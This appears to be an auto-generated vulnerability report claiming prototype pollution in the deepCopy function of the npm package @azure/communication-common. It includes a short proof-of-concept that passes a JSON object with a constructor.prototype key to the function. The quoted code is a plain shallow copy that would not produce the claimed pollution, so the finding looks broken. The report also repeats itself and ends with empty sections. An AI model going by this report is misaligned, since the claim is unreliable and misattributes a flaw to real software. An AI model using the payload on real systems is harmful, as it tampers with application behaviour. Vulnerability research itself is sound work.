Basic Information
Package Name: @azure/communication-common
Package URL: https://www.npmjs.com/package/@azure/communication-common
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@azure__communication-common_pollution_report.md
Vulnerable Code Location: lib/util/object.js → deepCopy function
Vulnerability Details
Vulnerability Type: Prototype Pollution
Root Cause
The deep copy function deepCopy fails to filter dangerous keys when iterating over object properties, allowing global prototype pollution through proto/constructor.
Problem Code Location
File: lib/util/object.js
Function: deepCopy
Vulnerable Code Snippet
export function deepCopy(target) {
const result = {};
for (let key in target) {
result[key] = target[key]; // Core Vulnerable Line
}
return result;
}POC (Reproducible Directly)
const comm = require('@azure/communication-common');
const hack = JSON.parse('{"constructor":{"prototype":{"test":"polluted"}}}');
comm.deepCopy(hack);
console.log({}.test); // Output: polluted
Basic Information
Package Name: @azure/communication-common
Package URL: https://www.npmjs.com/package/@azure/communication-common
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@azure__communication-common_pollution_report.md
Vulnerable Code Location: lib/util/object.js → deepCopy function
Vulnerability Details
Vulnerability Type: Prototype Pollution
Root Cause
The deep copy function deepCopy fails to filter dangerous keys when iterating over object properties, allowing global prototype pollution through proto/constructor.
Problem Code Location
File: lib/util/object.js
Function: deepCopy
Vulnerable Code Snippet
POC (Reproducible Directly)